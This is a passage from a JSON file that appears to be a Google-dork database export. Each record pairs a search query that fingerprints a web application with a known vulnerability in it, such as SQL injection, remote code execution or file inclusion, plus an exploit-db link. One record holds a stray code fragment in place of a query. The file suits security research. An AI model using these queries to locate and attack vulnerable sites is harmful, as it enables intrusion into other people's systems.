http://www.exploit-db.com/exploits/7896", "submited": "2010-11-15", "request": "intext:\"Powered by Lore 1.5.6\"", "id": 3374}, {"short description": "\"powered by jmdcms.com\"", "long description": "JMD-CMS Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/15044", "submited": "2010-11-15", "request": "\"powered by jmdcms.com\"", "id": 3375}, {"short description": "\"Driven by DokuWiki\"", "long description": "DokuWiki 2006-03-09b (dwpage.php) System Disclosure: http://www.exploit-db.com/exploits/2322", "submited": "2010-11-15", "request": "\"Driven by DokuWiki\"", "id": 3376}, {"short description": "intext:\"Powered by Pc4Uploader  v9.0\"", "long description": "Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability - CVE: 2009-1742: http://www.exploit-db.com/exploits/8709", "submited": "2010-11-15", "request": "intext:\"Powered by Pc4Uploader  v9.0\"", "id": 3377}, {"short description": "\"copyright 2006 Broadband Mechanics\"", "long description": "PeopleAggregator 1.2pre6-release-53 Multiple RFI Vulnerabilities - CVE: 2007-5631: http://www.exploit-db.com/exploits/4551", "submited": "2010-11-15", "request": "\"copyright 2006 Broadband Mechanics\"", "id": 3379}, {"short description": "\"powered by shutter v0.1.1\"", "long description": "Shutter 0.1.1 Multiple Remote SQL Injection Vulnerabilities - CVE: 2009-1650: http://www.exploit-db.com/exploits/8679", "submited": "2010-11-15", "request": "\"powered by shutter v0.1.1\"", "id": 3380}, {"short description": "\"Powered by PHP Director 0.2\"", "long description": "PHP Director 0.21 (sql into outfile) eval() Injection: http://www.exploit-db.com/exploits/8181", "submited": "2010-11-15", "request": "\"Powered by PHP Director 0.2\"", "id": 3381}, {"short description": "intitle:phpinfo intext:\"php version\" +windows", "long description": "PHP 5.x COM functions safe_mode and disable_function bypass - CVE: 2007-5653: http://www.exploit-db.com/exploits/4553", "submited": "2010-11-15", "request": "intitle:phpinfo intext:\"php version\" +windows", "id": 3382}, {"short description": "\"S-CMS by matteoiamma\"", "long description": "S-CMS 2.0b3 Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/8914", "submited": "2010-11-15", "request": "\"S-CMS by matteoiamma\"", "id": 3383}, {"short description": "inurl:\"modules/articles/index.php?cat_id=\"", "long description": "XOOPS module Articles 1.03 (index.php cat_id) SQL Injection - CVE: 2007-3311: http://www.exploit-db.com/exploits/3594", "submited": "2010-11-15", "request": "inurl:\"modules/articles/index.php?cat_id=\"", "id": 3384}, {"short description": "\"by Pivot - 1.40.5\"  +'Dreadwind' -pivotlog.net", "long description": "Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure - CVE: 2008-3128: http://www.exploit-db.com/exploits/5973", "submited": "2010-11-15", "request": "\"by Pivot - 1.40.5\"  +&#039;Dreadwind&#039; -pivotlog.net", "id": 3385}, {"short description": "\"PHP Easy Downloader\"", "long description": "PHP Easy Downloader 1.5 (save.php) Remote Code Execution: http://www.exploit-db.com/exploits/2812", "submited": "2010-11-15", "request": "\"PHP Easy Downloader\"", "id": 3386}, {"short description": "\"Powered by LoudBlog\"", "long description": "LoudBlog 0.5 (id) SQL Injection / Admin Credentials Disclosure - CVE: 2006-3832: http://www.exploit-db.com/exploits/2050", "submited": "2010-11-15", "request": "\"Powered by LoudBlog\"", "id": 3387}, {"short description": "\"Powered by visinia\"", "long description": "Visinia 1.3 Multiple Vulnerabilities - http://www.exploit-db.com/exploits/14879", "submited": "2010-11-15", "request": "\"Powered by visinia\"", "id": 3392}, {"short description": "\"Splatt Forum\"", "long description": "PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion - CVE: 2007-1633: http://www.exploit-db.com/exploits/3518", "submited": "2010-11-15", "request": "\"Splatt Forum\"", "id": 3395}, {"short description": "\"Powered by Seditio\"", "long description": "Seditio CMS 121 Remote SQL Injection - CVE: 2007-6202: http://www.exploit-db.com/exploits/4678", "submited": "2010-11-15", "request": "\"Powered by Seditio\"", "id": 3396}, {"short description": "aspWebLinks 2.0", "long description": "aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change - CVE: 2006-2848: http://www.exploit-db.com/exploits/1859", "submited": "2010-11-15", "request": "aspWebLinks 2.0", "id": 3402}, {"short description": "\"Powered by Burning Board Lite 1.0.2\" or \"Powered by Burning Board 2.3.6\"", "long description": "Woltlab Burning Board 1.0.2, 2.3.6 search.php SQL Injection - CVE: 2007-0388: http://www.exploit-db.com/exploits/3143", "submited": "2010-11-15", "request": "\"Powered by Burning Board Lite 1.0.2\" or \"Powered by Burning Board 2.3.6\"", "id": 3406}, {"short description": "inurl:/webquest/soporte_derecha_w.php?", "long description": "PHP Webquest 2.5 (id_actividad) Remote SQL Injection - CVE: 2007-4920: http://www.exploit-db.com/exploits/4407", "submited": "2010-11-15", "request": "inurl:/webquest/soporte_derecha_w.php?", "id": 3407}, {"short description": "intext:\"Powered by pppblog\"", "long description": "pppBlog 0.3.8 (randompic.php) System Disclosure - CVE: 2006-2770: http://www.exploit-db.com/exploits/1853", "submited": "2010-11-15", "request": "intext:\"Powered by pppblog\"", "id": 3410}, {"short description": "inurl:\"printable_pedigree.php\"", "long description": "Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling: http://www.exploit-db.com/exploits/8739", "submited": "2010-11-15", "request": "inurl:\"printable_pedigree.php\"", "id": 3411}, {"short description": "\"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"", "long description": "LifeType 1.0.4 SQL Injection / Admin Credentials Disclosure - CVE: 2006-2857: http://www.exploit-db.com/exploits/1874", "submited": "2010-11-15", "request": "\"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"", "id": 3415}, {"short description": "\"Powered by Leap\"", "long description": "Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities - CVE: 2009-1615: http://www.exploit-db.com/exploits/8577", "submited": "2010-11-15", "request": "\"Powered by Leap\"", "id": 3416}, {"short description": "inurl:pmwiki.php +\"Page last modified on\" | PmWikiPhilosophy", "long description": "PmWiki", "submited": "2010-11-15", "request": "inurl:pmwiki.php +\"Page last modified on\" | PmWikiPhilosophy", "id": 3417}, {"short description": "\"Powered by UPB\"", "long description": "Ultimate PHP Board 2.0 (header_simple.php) File Include - CVE: 2006-7169: http://www.exploit-db.com/exploits/2721", "submited": "2010-11-15", "request": "\"Powered by UPB\"", "id": 3418}, {"short description": "\"BioScripts\"", "long description": "MiniTwitter 0.2b Remote User Options Change - CVE: 2009-2574: http://www.exploit-db.com/exploits/8587", "submited": "2010-11-15", "request": "\"BioScripts\"", "id": 3420}, {"short description": "\"Powered by Claroline\" -demo", "long description": "Claroline", "submited": "2010-11-15", "request": "\"Powered by Claroline\" -demo", "id": 3421}, {"short description": "\"Galerie 3.2 2004 by progressive\"", "long description": "Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection - CVE: 2008-4516: http://www.exploit-db.com/exploits/6675", "submited": "2010-11-15", "request": "\"Galerie 3.2 2004 by progressive\"", "id": 3422}, {"short description": "inurl:sysinfo.cgi ext:cgi", "long description": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution - CVE: 2006-1831: http://www.exploit-db.com/exploits/1677", "submited": "2010-11-15", "request": "inurl:sysinfo.cgi ext:cgi", "id": 3423}, {"short description": "\"Powered by Burning Board\" -exploit -johnny", "long description": "Woltlab Burning Board Lite 1.0.2pl3e (pms.php) SQL Injection - CVE: 2007-0812: http://www.exploit-db.com/exploits/3262", "submited": "2010-11-15", "request": "\"Powered by Burning Board\" -exploit -johnny", "id": 3424}, {"short description": "\"Welcome to Exponent CMS\" | \"my new exponent site\"", "long description": "Exponent CMS 0.96.3 (view) Remote Command Execution - CVE: 2006-4963: http://www.exploit-db.com/exploits/2391", "submited": "2010-11-15", "request": "\"Welcome to Exponent CMS\" | \"my new exponent site\"", "id": 3425}, {"short description": "\"Powered by PMOS Help Desk\"", "long description": "PMOS Help Desk 2.4 Remote Command Execution - CVE: 2007-6550: http://www.exploit-db.com/exploits/4789", "submited": "2010-11-15", "request": "\"Powered by PMOS Help Desk\"", "id": 3426}, {"short description": "\"Powered By Pligg\" + \"Legal: License and Source\"", "long description": "Pligg 9.9.0 Remote Code Execution - CVE: 2008-7091: http://www.exploit-db.com/exploits/6172", "submited": "2010-11-15", "request": "\"Powered By Pligg\" + \"Legal: License and Source\"", "id": 3427}, {"short description": "Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin", "long description": "RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution - CVE: 2006-4723: http://www.exploit-db.com/exploits/2328", "submited": "2010-11-15", "request": "Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin", "id": 3429}, {"short description": "Site powered By Limbo CMS", "long description": "Limbo CMS 1.0.4.2 Cuid cookie Blind SQL Injection - CVE: 2008-0734: http://www.exploit-db.com/exploits/5088", "submited": "2010-11-15", "request": "Site powered By Limbo CMS", "id": 3431}, {"short description": "inurl:naviid + inurl:liste9", "long description": "Aiyoota! CMS - Blind SQL Injection: http://www.exploit-db.com/exploits/7490", "submited": "2010-11-15", "request": "inurl:naviid + inurl:liste9", "id": 3432}, {"short description": "\"POWERED BY PHPNUKE.IR\"", "long description": "PHPnuke 8.2 Remote Upload File: http://www.exploit-db.com/exploits/14058", "submited": "2010-11-15", "request": "\"POWERED BY PHPNUKE.IR\"", "id": 3433}, {"short description": "inurl:\"com_gcalendar\"", "long description": "Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection Vulnerability - CVE: 2009-4099: http://www.exploit-db.com/exploits/10232", "submited": "2010-11-15", "request": "inurl:\"com_gcalendar\"", "id": 3434}, {"short description": "\"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo", "long description": "toendaCMS 1.0.0 (FCKeditor) Remote File Upload: http://www.exploit-db.com/exploits/2035", "submited": "2010-11-15", "request": "\"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo", "id": 3437}, {"short description": "Powered by WikyBlog", "long description": "WikyBlog v1.7.3rc2 Multiple Vulnerabilities - CVE: 2010-0754: http://www.exploit-db.com/exploits/11560", "submited": "2010-11-15", "request": "Powered by WikyBlog", "id": 3438}, {"short description": "\"powered by yourtube\"", "long description": "YourTube 2.0 Arbitrary Database Disclosure: http://www.exploit-db.com/exploits/9073", "submited": "2010-11-15", "request": "\"powered by yourtube\"", "id": 3439}, {"short description": "\"Powered by cpCommerce\"", "long description": "cpCommerce", "submited": "2010-11-15", "request": "\"Powered by cpCommerce\"", "id": 3440}, {"short description": "\"propuls par JBlog\"", "long description": "JBlog 1.0 Create / Delete Admin Authentication Bypass - CVE: 2007-3973: http://www.exploit-db.com/exploits/4211", "submited": "2010-11-15", "request": "\"propuls par JBlog\"", "id": 3443}, {"short description": "FhImage, powered by Flash-here.com", "long description": "Fhimage 1.2.1 Remote Index Change: http://www.exploit-db.com/exploits/7820", "submited": "2010-11-15", "request": "FhImage, powered by Flash-here.com", "id": 3444}, {"short description": "\"Powered by: Arab Portal v2\"", "long description": "Arab Portal v2.x (forum.php qc) Remote SQL Injection - CVE: 2009-2781: http://www.exploit-db.com/exploits/9320", "submited": "2010-11-15", "request": "\"Powered by: Arab Portal v2\"", "id": 3445}, {"short description": "\"Powered by PHP iCalendar\"", "long description": "PHP iCalendar 2.24 (cookie_language) LFI / File Upload - CVE: 2008-5967: http://www.exploit-db.com/exploits/6519", "submited": "2010-11-15", "request": "\"Powered by PHP iCalendar\"", "id": 3446}, {"short description": "POWERED BY ALITALK", "long description": "ALITALK 1.9.1.1 Multiple Remote Vulnerabilities - CVE: 2008-0371: http://www.exploit-db.com/exploits/4922", "submited": "2010-11-15", "request": "POWERED BY ALITALK", "id": 3447}, {"short description": "Copyright 2010. Software Index", "long description": "Software Index (Remote File Upload) Exploit: http://www.exploit-db.com/exploits/13999", "submited": "2010-11-15", "request": "Copyright 2010. Software Index", "id": 3449}, {"short description": "\"Powered by MDForum\"", "long description": "MDForum 2.0.1 (PNSVlang) Remote Code Execution - CVE: 2006-6869: http://www.exploit-db.com/exploits/3057", "submited": "2010-11-15", "request": "\"Powered by MDForum\"", "id": 3451}, {"short description": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "long description": "PAPOO 3_RC3 SQL Injection/Admin Credentials Disclosure - CVE: 2006-3571: http://www.exploit-db.com/exploits/1993", "submited": "2010-11-15", "request": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "id": 3452}, {"short description": "\"Powered by mojoPortal\"", "long description": "mojoportal Multiple Remote Vulnerabilities - CVE: 2010-3602: http://www.exploit-db.com/exploits/15018", "submited": "2010-11-15", "request": "\"Powered by mojoPortal\"", "id": 3453}, {"short description": "intitle:\"login to cacti\"", "long description": "Cacti 0.8.6i (copy_cacti_user.php) SQL Injection: http://www.exploit-db.com/exploits/3045", "submited": "2010-11-15", "request": "intitle:\"login to cacti\"", "id": 3454}, {"short description": "\"BioScripts\"", "long description": "MiniTwitter 0.3-Beta (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8778", "submited": "2010-11-15", "request": "\"BioScripts\"", "id": 3455}, {"short description": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "long description": "PHP Advanced Transfer Manager 1.30 Source Code Disclosure: http://www.exploit-db.com/exploits/2968", "submited": "2010-11-15", "request": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "id": 3459}, {"short description": "Small Business Manager", "long description": "Plesk Small Business Manager 10.2.0 and Site Editor Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15313", "submited": "2010-11-15", "request": "Small Business Manager", "id": 3461}, {"short description": "\"Powered by webSPELL\"", "long description": "webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability - CVE: 2009-1408: http://www.exploit-db.com/exploits/8453", "submited": "2010-11-15", "request": "\"Powered by webSPELL\"", "id": 3462}, {"short description": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "long description": "Papoo 3.02 (kontakt menuid) Remote SQL Injection - CVE: 2007-2320: http://www.exploit-db.com/exploits/3739", "submited": "2010-11-15", "request": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "id": 3463}, {"short description": "\"Powered by IMGallery\"", "long description": "IMGallery 2.5 Create Uploader Script - CVE: 2007-0082: http://www.exploit-db.com/exploits/3049", "submited": "2010-11-15", "request": "\"Powered by IMGallery\"", "id": 3464}, {"short description": "intext:\"Powered by Plogger!\" -plogger.org", "long description": "Plogger Beta 2.1 Administrative Credentials Disclosure: http://www.exploit-db.com/exploits/1621", "submited": "2010-11-15", "request": "intext:\"Powered by Plogger!\" -plogger.org", "id": 3465}, {"short description": "\"Powered by FreeWebshop.org 2.2.1\"", "long description": "FreeWebshop 2.2.1 Remote Blind SQL Injection - CVE: 2007-6466: http://www.exploit-db.com/exploits/4740", "submited": "2010-11-15", "request": "\"Powered by FreeWebshop.org 2.2.1\"", "id": 3466}, {"short description": "\"powered by XHP CMS\"", "long description": "XHP CMS 0.5 (upload) Remote Command Execution - CVE: 2006-1371: http://www.exploit-db.com/exploits/1605", "submited": "2010-11-15", "request": "\"powered by XHP CMS\"", "id": 3467}, {"short description": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "long description": "Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection - CVE: 2008-6988: http://www.exploit-db.com/exploits/6428", "submited": "2010-11-15", "request": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "id": 3468}, {"short description": "Portal By vbPortal Version 3.5.0", "long description": "vbPortal 3.0.2 3.6.0 b1 (cookie) Remote Code Excution - CVE: 2006-4004: http://www.exploit-db.com/exploits/2087", "submited": "2010-11-15", "request": "Portal By vbPortal Version 3.5.0", "id": 3469}, {"short description": ": inurll ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; \"top\" , -anchor =&gt; 'e' ) ;", "long description": "http://www.exploit-db.com/exploits/3759", "submited": "2010-11-15", "request": "", "id": 3471}, {"short description": "\"Copyright @2007 Iatek LLC\"", "long description": "PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities - CVE: 2008-4612: http://www.exploit-db.com/exploits/4848", "submited": "2010-11-15", "request": "\"Copyright @2007 Iatek LLC\"", "id": 3472}, {"short description": "\"&amp; Spider Friendly by Crack\"", "long description": "phpBB Spider Friendly Module 1.3.10 File Include - CVE: 2006-5665: http://www.exploit-db.com/exploits/2686", "submited": "2010-11-15", "request": "\"&amp; Spider Friendly by Crack\"", "id": 3473}, {"short description": "intitle:\"login to cacti\"", "long description": "Cacti 0.8.6i cmd.php popen() Remote Injection: http://www.exploit-db.com/exploits/3029", "submited": "2010-11-15", "request": "intitle:\"login to cacti\"", "id": 3474}, {"short description": "Welcome to your PHPOpenChat-Installation!", "long description": "ADODB 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection: http://www.exploit-db.com/exploits/1652", "submited": "2010-11-15", "request": "Welcome to your PHPOpenChat-Installation!", "id": 3475}, {"short description": "\"powered by TSEP - The Search Engine Project\"", "long description": "TSEP 0.942.02 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/9057", "submited": "2010-11-15", "request": "\"powered by TSEP - The Search Engine Project\"", "id": 3476}, {"short description": "WEBalbum 2004-2006 duda", "long description": "WebAlbum 2.02pl COOKIE[skin2] Remote Code Execution - CVE: 2006-1480: http://www.exploit-db.com/exploits/1608", "submited": "2010-11-15", "request": "WEBalbum 2004-2006 duda", "id": 3477}, {"short description": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "long description": "PHP-Update", "submited": "2010-11-15", "request": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "id": 3478}, {"short description": "\"Powered by Zomplog\"", "long description": "Zomplog 3.8.1 upload_files.php Arbitrary File Upload - CVE: 2007-5230: http://www.exploit-db.com/exploits/4466", "submited": "2010-11-15", "request": "\"Powered by Zomplog\"", "id": 3480}, {"short description": "intext:\"Powered by simplog\"", "long description": "Simplog 0.9.2 (s) Remote Commands Execution - CVE: 2006-0146: http://www.exploit-db.com/exploits/1663", "submited": "2010-11-15", "request": "intext:\"Powered by simplog\"", "id": 3481}, {"short description": "\"Powered by SMF\"", "long description": "Simple Machines Forum 1.1 rc2 local inclusion: http://www.exploit-db.com/exploits/2231", "submited": "2010-11-15", "request": "\"Powered by SMF\"", "id": 3482}, {"short description": "inurl:php-stats.js.php", "long description": "Php-Stats 0.1.9.1b (php-stats-options.php) admin 2 exec() - CVE: 2006-7173: http://www.exploit-db.com/exploits/3502", "submited": "2010-11-15", "request": "inurl:php-stats.js.php", "id": 3483}, {"short description": "\"Powered by MercuryBoard\"", "long description": "MercuryBoard 1.1.4 (User-Agent) Remote SQL Injection: http://www.exploit-db.com/exploits/2247", "submited": "2010-11-15", "request": "\"Powered by MercuryBoard\"", "id": 3484}, {"short description": "\"Powered by Drake CMS\" inurl:index.php?option=guestbook", "long description": "Drake CMS 0.4.11 Remote Blind SQL Injection - CVE: 2008-6475: http://www.exploit-db.com/exploits/5391", "submited": "2010-11-15", "request": "\"Powered by Drake CMS\" inurl:index.php?option=guestbook", "id": 3485}, {"short description": "\"Driven by DokuWiki\"", "long description": "DokuWiki 2006-03-09b (dwpage.php) Remote Code Execution: http://www.exploit-db.com/exploits/2321", "submited": "2010-11-15", "request": "\"Driven by DokuWiki\"", "id": 3486}, {"short description": "\"powered by php update\"", "long description": "PHP-Update 2.7 (admin/uploads.php) Remote Code Execution - CVE: 2006-6878: http://www.exploit-db.com/exploits/3020", "submited": "2010-11-15", "request": "\"powered by php update\"", "id": 3487}, {"short description": "\"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search", "long description": "Jaws 0.6.2 (Search gadget) Remote SQL Injection - CVE: 2006-3292: http://www.exploit-db.com/exploits/1946/", "submited": "2010-11-15", "request": "\"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search", "id": 3488}, {"short description": "Realizzato utilizzando Web Portal", "long description": "WebPortal CMS 0.6-beta Remote Password Change - CVE: 2008-0142: http://www.exploit-db.com/exploits/4835", "submited": "2010-11-15", "request": "Realizzato utilizzando Web Portal", "id": 3489}, {"short description": "\"powered by ILIAS\"", "long description": "ILIAS LMS 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns: http://www.exploit-db.com/exploits/9151", "submited": "2010-11-15", "request": "\"powered by ILIAS\"", "id": 3491}, {"short description": "\"This site is powered by CMS Made Simple\"", "long description": "CMS Made Simple 1.2.4 (FileManager module) File Upload - CVE: 2008-2267: http://www.exploit-db.com/exploits/5600", "submited": "2010-11-15", "request": "\"This site is powered by CMS Made Simple\"", "id": 3493}, {"short description": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "long description": "Flatnuke 2.5.8 file() Priv Escalation / Code Execution: http://www.exploit-db.com/exploits/2498", "submited": "2010-11-15", "request": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "id": 3494}, {"short description": "\"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hulan\"", "long description": "BLOG:CMS 4.0.0k Remote SQL Injection - CVE: 2006-3364: http://www.exploit-db.com/exploits/1960", "submited": "2010-11-15", "request": "\"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hulan\"", "id": 3495}, {"short description": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top", "long description": "Nucleus CMS 3.22 (DIR_LIBS) Arbitrary Remote Inclusion - CVE: 2006-2583: http://www.exploit-db.com/exploits/1816", "submited": "2010-11-15", "request": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top", "id": 3496}, {"short description": "\"by eXtreme Crew\"", "long description": "extreme-fusion 4.02 Remote Code Execution: http://www.exploit-db.com/exploits/2937", "submited": "2010-11-15", "request": "\"by eXtreme Crew\"", "id": 3497}, {"short description": "\"2007 Rafal Kucharski\"", "long description": "RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection - CVE: 2009-1910: http://www.exploit-db.com/exploits/8648", "submited": "2010-11-15", "request": "\"2007 Rafal Kucharski\"", "id": 3498}, {"short description": "\"This forum powered by Phorum.\"", "long description": "Phorum 5 (pm.php) Arbitrary Local Inclusion - CVE: 2006-3611: http://www.exploit-db.com/exploits/2008", "submited": "2010-11-15", "request": "\"This forum powered by Phorum.\"", "id": 3499}, {"short description": "\"is proudly powered by WordPress\"", "long description": "Wordpress 2.0.6 wp-trackback.php Remote SQL Injection - CVE: 2007-0233: http://www.exploit-db.com/exploits/3109", "submited": "2010-11-15", "request": "\"is proudly powered by WordPress\"", "id": 3500}, {"short description": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "long description": "Woltlab Burning Board Lite 1.0.2 Blind SQL Injection: http://www.exploit-db.com/exploits/2842", "submited": "2010-11-15", "request": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "id": 3501}, {"short description": "FhImage, powered by Flash-here.com", "long description": "Fhimage 1.2.1 Remote Command Execution: http://www.exploit-db.com/exploits/7821", "submited": "2010-11-15", "request": "FhImage, powered by Flash-here.com", "id": 3502}, {"short description": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "long description": "Flatnuke 2.5.8 (userlang) Local Inclusion / Delete All Users: http://www.exploit-db.com/exploits/2499", "submited": "2010-11-15", "request": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "id": 3503}, {"short description": "\"powered by blur6ex\"", "long description": "blur6ex 0.3.462 (ID) Admin Disclosure / Blind SQL Injection - CVE: 2006-3065: http://www.exploit-db.com/exploits/1904", "submited": "2010-11-15", "request": "\"powered by blur6ex\"", "id": 3504}, {"short description": "\"Powered by Claroline\" -demo", "long description": "Claroline 1.7.4 (scormExport.inc.php) Remote Code Execution: http://www.exploit-db.com/exploits/1627", "submited": "2010-11-15", "request": "\"Powered by Claroline\" -demo", "id": 3505}, {"short description": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "long description": "Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection - CVE: 2006-6237: http://www.exploit-db.com/exploits/2841", "submited": "2010-11-15", "request": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "id": 3508}, {"short description": "\"Personal .NET Portal\"", "long description": "Personal.Net Portal Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15067", "submited": "2010-11-15", "request": "\"Personal .NET Portal\"", "id": 3510}, {"short description": "\"SmodBIP\" &amp; \"Aktualno.ci\"", "long description": "SmodBIP 1.06 (aktualnosci zoom) Remote SQL Injection - CVE: 2007-1920: http://www.exploit-db.com/exploits/3678", "submited": "2010-11-15", "request": "\"SmodBIP\" &amp; \"Aktualno.ci\"", "id": 3511}, {"short description": "\"SmodCMS\" &amp; \"S.ownik\"", "long description": "SmodCMS 2.10 (Slownik ssid) Remote SQL Injection - CVE: 2007-1931: http://www.exploit-db.com/exploits/3679", "submited": "2010-11-15", "request": "\"SmodCMS\" &amp; \"S.ownik\"", "id": 3512}, {"short description": "\"is a product of Lussumo\"", "long description": "Vanilla 1.1.3 Remote Blind SQL Injection - CVE: 2007-5643: http://www.exploit-db.com/exploits/4548", "submited": "2010-11-15", "request": "\"is a product of Lussumo\"", "id": 3513}, {"short description": "inurl:\"index.php?name=PNphpBB2\"", "long description": "PNphpBB2 1.2 (index.php c) Remote SQL Injection - CVE: 2007-3052: http://www.exploit-db.com/exploits/4026", "submited": "2010-11-15", "request": "inurl:\"index.php?name=PNphpBB2\"", "id": 3514}, {"short description": "\"propulse par DotClear\" \"fil atom\" \"fil rss\" +commentaires", "long description": "DotClear 1.2.4 (prepend.php) Arbitrary Remote Inclusion - CVE: 2006-2866: http://www.exploit-db.com/exploits/1869", "submited": "2010-11-15", "request": "\"propulse par DotClear\" \"fil atom\" \"fil rss\" +commentaires", "id": 3515}, {"short description": "\"Powered by Online Grades\"", "long description": "Online Grades &amp; Attendance 3.2.6 Credentials Changer SQL injection: http://www.exploit-db.com/exploits/8843", "submited": "2010-11-15", "request": "\"Powered by Online Grades\"", "id": 3516}, {"short description": "\"Powered by PHP Photo Album\"", "long description": "phpAlbum", "submited": "2010-11-15", "request": "\"Powered by PHP Photo Album\"", "id": 3517}, {"short description": "\"Powered by ClanTiger\"", "long description": "ClanTiger 1.1.1 Multiple Cookie Handling Vulnerabilities: http://www.exploit-db.com/exploits/8471", "submited": "2010-11-15", "request": "\"Powered by ClanTiger\"", "id": 3518}, {"short description": "\"Site powered by GuppY\" | \"Site cree avec GuppY\" +inurl:lng=", "long description": "GuppY 4.5.16 Remote Commands Execution - CVE: 2007-0639: http://www.exploit-db.com/exploits/3221", "submited": "2010-11-15", "request": "\"Site powered by GuppY\" | \"Site cree avec GuppY\" +inurl:lng=", "id": 3519}, {"short description": "\"powered by php photo album\" -demo2 -pitanje\"", "long description": "PHP Album 0.3.2.3 Remote Command Execution: http://www.exploit-db.com/exploits/1678", "submited": "2010-11-15", "request": "\"powered by php photo album\" -demo2 -pitanje\"", "id": 3520}, {"short description": "inurl:/modules/lykos_reviews/", "long description": "XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection - CVE: 2007-1817: http://www.exploit-db.com/exploits/3618", "submited": "2010-11-15", "request": "inurl:/modules/lykos_reviews/", "id": 3521}, {"short description": "\"Powered By X7 Chat\"", "long description": "X7 Chat 2.0.4 (old_prefix) Remote Blind SQL Injection - CVE: 2006-3851: http://www.exploit-db.com/exploits/2068", "submited": "2010-11-15", "request": "\"Powered By X7 Chat\"", "id": 3522}, {"short description": "\"powered by guestbook script\"", "long description": "GuestBook Script 1.7 (include_files) Remote Code Execution: http://www.exploit-db.com/exploits/1575", "submited": "2010-11-15", "request": "\"powered by guestbook script\"", "id": 3524}, {"short description": "index.php?option=com_ezine", "long description": "Joomla Component D4JeZine 2.8 Remote BLIND SQL Injection - CVE: 2007-1776: http://www.exploit-db.com/exploits/3590", "submited": "2010-11-15", "request": "index.php?option=com_ezine", "id": 3525}, {"short description": "\"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files", "long description": "e107 0.75 (GLOBALS Overwrite) Remote Code Execution: http://www.exploit-db.com/exploits/2268", "submited": "2010-11-15", "request": "\"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files", "id": 3526}, {"short description": "inurl:/modules/xfsection/", "long description": "XOOPS Module XFsection 1.07 (articleid) BLIND SQL Injection - CVE: 2005-0725: http://www.exploit-db.com/exploits/3645", "submited": "2010-11-15", "request": "inurl:/modules/xfsection/", "id": 3529}, {"short description": "inurl:\"phpwcms/index.php?id=\"", "long description": "phpwcms 1.2.6 (Cookie: wcs_user_lang) Local File Include: http://www.exploit-db.com/exploits/2758", "submited": "2010-11-15", "request": "inurl:\"phpwcms/index.php?id=\"", "id": 3530}, {"short description": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "long description": "PHPGraphy 0.9.12 Privilege Escalation / Commands Execution: http://www.exploit-db.com/exploits/2867", "submited": "2010-11-15", "request": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "id": 3531}, {"short description": 